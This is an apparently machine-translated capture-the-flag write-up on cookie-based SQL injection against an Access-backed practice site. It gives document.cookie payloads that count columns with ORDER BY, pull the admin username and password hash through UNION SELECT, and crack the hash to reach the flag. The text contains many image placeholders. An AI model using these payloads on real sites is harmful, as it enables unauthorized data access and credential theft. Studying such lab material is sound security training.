Acess injection-Cookie injection

Others 2021-01-22 13:30:35 views: null

Acess injection-Cookie injection

Shooting range address
Principle: $_REQUEST[] in php can get POST|GET|COOKIE parameters, you can use burp to capture packets to modify the parameters of the cookie, or you can use the console to use JS for cookie injection

first question:

We go into the shooting range and click a link to enter the interface with id transfer parameters.
Insert picture description hereLet’s try first to see if we can perform GET parameter transfer for error injection. We found that it was forbidden, so we tried cookie injection. Open burp to capture the packet and remove the id=171 above. Add; after the cookie; close, and then enter id=171, and see Whether the statement is executed and then put the package, I found that there is no id parameter, but the page returns to the normal representative. The statement I entered was successfully executed , so I use JS to determine the number of fields in the console
Bold style


Insert picture description here
Insert picture description here
Insert picture description here

document.cookie="id="+escape("171 order by 1")

Insert picture description hereThe page is normal, we continue to enlarge, to 11

document.cookie="id="+escape("171 order by 11")

Insert picture description hereError, we enter 10

document.cookie="id="+escape("171 order by 10")

Insert picture description hereThe page is normal, so we determine that there are 10 fields, continue to enter the JS statement

document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")

Insert picture description hereBecause the access database has only one library name, you need to write from admin to find the output bits 2, 3, 7, 8, 9 of the database to
determine the table name. We can use the method of guessing and manually blast
Insert picture description herebut it is more suitable for novices We used burp to blast, so we
Insert picture description herecaptured the packet and found
Insert picture description heremany possible table names, but generally in the era when Access databases were popular, they were all in the username and password fields of the admin table,
so we entered directly

document.cookie="id="+escape("171 union select 1,username,3,4,5,6,7,8,9,10 from admin")

Insert picture description hereFind the account admin and
continue typing

document.cookie="id="+escape("171 union select 1,password,3,4,5,6,7,8,9,10 from admin")

Insert picture description hereFind the password
b9a2a2b5dffb918c
login in the background
Insert picture description herebut the password is wrong

Insert picture description hereDecrypt the password md5
Insert picture description hereInsert picture description hereto get the flag: zkz{welcome-control}

Guess you like

Origin blog.csdn.net/weixin_43264067/article/details/106050363
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com